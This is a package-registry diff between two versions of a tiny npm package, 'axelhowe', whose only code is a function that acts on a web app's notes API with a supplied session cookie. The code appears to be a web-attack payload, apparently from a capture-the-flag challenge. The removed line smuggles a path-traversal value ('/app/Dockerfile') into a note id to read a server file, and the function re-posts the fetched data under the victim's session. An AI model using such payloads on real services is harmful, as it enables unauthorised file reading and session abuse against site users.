axelhowe 0.0.0-sGDItU2w → 0.0.0-xKpGaKj5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +2 -2
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -1,5 +1,5 @@
1
1
  function f(cookie) {
2
- let url = "/api/notes?id=/app/Dockerfile";
2
+ let url = "/api/notes?id=a83ed14e-8c1c-43c3-ad7a-b5393ad85a3d";
3
3
  let url2 = "/api/notes";
4
4
  let data;
5
5
 
@@ -29,7 +29,7 @@ function f(cookie) {
29
29
  "content-type": "application/json",
30
30
  "cookie": "session=" + cookie
31
31
  },
32
- body: JSON.stringify({ "title": data.title, "content": data.content })
32
+ body: JSON.stringify({ "title": data.title, "content": data.id })
33
33
  }
34
34
  );
35
35
  });
package/package.json CHANGED
@@ -1 +1 @@
1
- {"name":"axelhowe","version":"0.0.0-sGDItU2w"}
1
+ {"name":"axelhowe","version":"0.0.0-xKpGaKj5"}